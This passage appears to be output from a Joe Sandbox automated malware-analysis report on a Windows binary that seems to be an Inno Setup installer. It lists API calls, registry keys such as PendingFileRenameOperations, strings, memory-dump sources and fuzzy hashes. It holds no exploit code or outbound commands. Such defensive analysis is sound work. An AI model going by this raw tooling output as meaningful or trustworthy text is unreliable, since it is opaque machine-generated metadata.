                                                                  • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                  • API String ID: 395431579-1506664499
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                                  Strings
                                                                  • PendingFileRenameOperations2, xrefs: 00455A23
                                                                  • PendingFileRenameOperations, xrefs: 00455A14
                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                  • API String ID: 47109696-2115312317
                                                                  APIs
                                                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                                  • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                                  Similarity
                                                                  • API ID: Find$CloseFileNext
                                                                  • String ID:
                                                                  • API String ID: 2066263336-0
                                                                  APIs
                                                                  • GetMenu.USER32(00000000), ref: 00421359
                                                                  • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                                  Similarity
                                                                  • API ID: Menu
                                                                  • String ID:
                                                                  • API String ID: 3711407533-0
                                                                  APIs
                                                                  • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                                  • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                                  Similarity
                                                                  • API ID: Color$CallMessageProcSendTextWindow
                                                                  • String ID:
                                                                  • API String ID: 601730667-0
                                                                  APIs
                                                                  • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                  • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                  Similarity
                                                                  • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                  • String ID:
                                                                  • API String ID: 4071923889-0
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                  • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                  • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                  Similarity
                                                                  • API ID: A24620A480A570EnumFonts
                                                                  • String ID:
                                                                  • API String ID: 2630238358-0
                                                                  APIs
                                                                    • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                  • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                                  Strings
                                                                  • NumRecs range exceeded, xrefs: 0045C1B6
                                                                  • EndOffset range exceeded, xrefs: 0045C1ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$BuffersFlush
                                                                  • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                  • API String ID: 3593489403-659731555
                                                                  • Opcode ID: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                                  • Instruction ID: f1827e02de76a306a1886b93aefbbb2344be70999cb9be9d3c0cbcfad0efad24
                                                                  • Opcode Fuzzy Hash: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                                  • Instruction Fuzzy Hash: 35616334A002548FDB25DF25C891ADAB7B5AF49305F0084DAED88AB353D7749EC9CF54
                                                                  APIs
                                                                    • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                    • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                    • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                    • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                    • Part of subcall function 00409B70: 6F551CD0.COMCTL32(004980D6), ref: 00409B70
                                                                    • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                                    • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                                    • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                    • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                    • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                                    • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                    • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                    • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                    • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                    • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                    • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                    • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                    • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                    • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                    • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                    • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                    • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                                    • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                    • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                    • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                                    • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                  • String ID: Setup
                                                                  • API String ID: 3870281231-3839654196
                                                                  • Opcode ID: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                  • Instruction ID: d0c772c7b00e67a50ac74b8b43c66aaf35bd51fc0d8445b6be8c1c392d06dbfc
                                                                  • Opcode Fuzzy Hash: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                  • Instruction Fuzzy Hash: 6E31A471208A409ED601BBB7ED53A293B98EF89B18B61447FF80482593DE3D5C158A7E
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue
                                                                  • String ID: 2H
                                                                  • API String ID: 3660427363-1900415311
                                                                  • Opcode ID: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                  • Instruction ID: 6f29e5db34dee79be2e4bdbc2feb63702d0df34b1de6f6cc3bdc936bcd48876b
                                                                  • Opcode Fuzzy Hash: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                  • Instruction Fuzzy Hash: 88414271E04529ABDB11DF95D881BAFB7B8EF05704FA18466E800F7241D778EE01CBA9
                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID: .tmp
                                                                  • API String ID: 1375471231-2986845003
                                                                  • Opcode ID: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                  • Instruction ID: 5c47afe113f3b23246b8f03ea8338b9bfcdda488aecdb3892d8cb76e5c942ae9
                                                                  • Opcode Fuzzy Hash: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                  • Instruction Fuzzy Hash: 4A213374A00218ABDB01EFA5C8529DFB7B9EF48305F50457BE801B7342DA7C9F059BA9
                                                                  APIs
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID: RegisteredOrganization$RegisteredOwner
                                                                  • API String ID: 3535843008-1113070880
                                                                  • Opcode ID: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                  • Instruction ID: 7ba728e1ef3f38ce6dcb00f7549556e1698566df6bc9e7584ed9d3abf6b47640
                                                                  • Opcode Fuzzy Hash: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                  • Instruction Fuzzy Hash: 2CF09060704244AFEB00E665DC92BEA33A9D745304F20803BE2048B392D779AE00CB5C
                                                                  APIs
                                                                  • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: Inno Setup: Setup Version$r_G
                                                                  • API String ID: 3702945584-2380526977
                                                                  • Opcode ID: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                  • Instruction ID: ba068d84db82e82ca1a3bed1356aff977b130b22b64274b732cbd5037cad883f
                                                                  • Opcode Fuzzy Hash: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                  • Instruction Fuzzy Hash: 7DE06D753012047FD710AA2F9C85F5BBADCDF88765F10403AB908DB392D978DD0181A9
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                  • String ID: CreateFile
                                                                  • API String ID: 2528220319-823142352
                                                                  • Opcode ID: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                  • Instruction ID: 870c31508693feaa39a4cce9bbdb9491accbaf3cbacbc975652ec4f9337bcdac
                                                                  • Opcode Fuzzy Hash: 45f398a1a593fdecff2147bb029019ab571d1f120eeae4798deb9ab921dd96fc
                                                                  • Instruction Fuzzy Hash: 88E06D302403447FEA10EA69CCC6F497798AB04728F10C152FA48AF3E2C5B9FC80866C
                                                                  APIs
                                                                    • Part of subcall function 00456E64: CoInitialize.OLE32(00000000), ref: 00456E6A
                                                                    • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                    • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                  • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                  • API String ID: 2906209438-2320870614
                                                                  • Opcode ID: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                  • Instruction ID: 195fe0e36b32ee525331c9a8c220a45252f3edc4141651a384f0b9e1c2da6bc9
                                                                  • Opcode Fuzzy Hash: 08d23a7e6096c5616a14a2d2cd89d11c62b3b5d1f72113431a163231d9b2ac33
                                                                  • Instruction Fuzzy Hash: 45C00291B4265092CA40B7FA695261E28049B8031AB92813BB951A7587CA6C88099A6E
                                                                  APIs
                                                                    • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                    • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressErrorLibraryLoadModeProc
                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                  • API String ID: 2492108670-2683653824
                                                                  • Opcode ID: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                  • Instruction ID: f133f44782887ed2db26bd8e5f2adaf6b1782a38bec069888892578a86e918ee
                                                                  • Opcode Fuzzy Hash: 55b93e5fb714966f70f5ffd37ba9539aaa645b322ed6e907ef1699bb6481b051
                                                                  • Instruction Fuzzy Hash: 85B092A060274086CB00B7A2699262B28059740309B90803BB0889B286EA3C88121BEF
                                                                  APIs
                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448701), ref: 00448644
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 2574300362-0
                                                                  APIs
                                                                  • GetSystemMenu.USER32(00000000,00000000,00000000,00481378), ref: 00481310
                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481321
                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481339
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Menu$Append$System
                                                                  • String ID:
                                                                  • API String ID: 1489644407-0
                                                                  APIs
                                                                  • 74D41520.VERSION(00000000,?,?,?,00496E0C), ref: 00452504
                                                                  • 74D41500.VERSION(00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 00452531
                                                                  • 74D41540.VERSION(?,004525A8,?,?,00000000,?,00000000,?,00000000,0045257F,?,00000000,?,?,?,00496E0C), ref: 0045254B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: D41500D41520D41540
                                                                  • String ID:
                                                                  • API String ID: 2153611984-0
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B3F9
                                                                  • SelectObject.GDI32(?,00000000), ref: 0044B41C
                                                                  • 73A1A480.USER32(00000000,?,0044B45C,00000000,0044B455,?,00000000,?,00000000,00000000,0044B485,?,00481BA7,?,?), ref: 0044B44F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: A480A570ObjectSelect
                                                                  • String ID:
                                                                  • API String ID: 1230475511-0
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B144,?,00481BA7,?,?), ref: 0044B116
                                                                  • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B129
                                                                  • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B15D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: DrawText$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 65125430-0
                                                                  APIs
                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042440A
                                                                  • TranslateMessage.USER32(?), ref: 00424487
                                                                  • DispatchMessageA.USER32(?), ref: 00424491
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Message$DispatchPeekTranslate
                                                                  • String ID:
                                                                  • API String ID: 4217535847-0
                                                                  APIs
                                                                  • SetPropA.USER32(00000000,00000000), ref: 00416662
                                                                  • SetPropA.USER32(00000000,00000000), ref: 00416677
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 0041669E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Prop$Window
                                                                  • String ID:
                                                                  • API String ID: 3363284559-0
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0041EE5C
                                                                  • IsWindowEnabled.USER32(?), ref: 0041EE66
                                                                  • EnableWindow.USER32(?,00000000), ref: 0041EE8C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Window$EnableEnabledVisible
                                                                  • String ID:
                                                                  • API String ID: 3234591441-0
                                                                  APIs
                                                                  • SetActiveWindow.USER32(?), ref: 00469E55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ActiveWindow
                                                                  • String ID: PrepareToInstall
                                                                  • API String ID: 2558294473-1101760603
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: /:*?"<>|
                                                                  • API String ID: 0-4078764451
                                                                  APIs
                                                                  • SetActiveWindow.USER32(?), ref: 00481C3A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ActiveWindow
                                                                  • String ID: InitializeWizard
                                                                  • API String ID: 2558294473-2356795471
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
